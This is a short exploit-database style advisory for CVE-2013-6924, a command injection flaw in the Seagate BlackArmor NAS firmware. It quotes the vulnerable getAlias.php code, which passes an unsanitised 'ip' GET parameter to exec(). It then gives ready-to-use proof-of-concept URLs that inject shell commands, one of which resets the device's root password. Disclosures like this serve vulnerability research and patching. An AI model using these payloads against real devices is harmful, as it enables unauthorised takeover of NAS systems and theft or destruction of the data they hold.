# Exploit Title: Seagate BlackArmor NAS - Remote Command Execution # Google Dork: N/A # Date: 04-01-2014 # Exploit Author: Jeroen - IT Nerdbox # Vendor Homepage: <http://www.seagate.com/> http://www.seagate.com/ # Software Link: <http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/ > http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/ # Version: sg2000-2000.1331 # Tested on: N/A # CVE : CVE-2013-6924 # ## Description: # # The file getAlias.php located in /backupmgt has the following lines: # # $ipAddress = $_GET["ip"; # if ($ipAddress != "") { # exec("grep -I $ipAddress $immedLogFile > aliasHistory.txt"); # .. # .. # } # # The GET parameter can easily be manipulated to execute commands on the BlackArmor system. # ## Proof of Concept: # # http(s)://<ip | host>/backupmgt/getAlias.php?ip=xx /etc/passwd; <your command here>; # ## Example to change the root password to 'mypassword': # # http(s)://<ip | host>/backupmgt/getAlias.php?ip=xx /etc/passwd; echo 'mypassword' | passwd --stdin;
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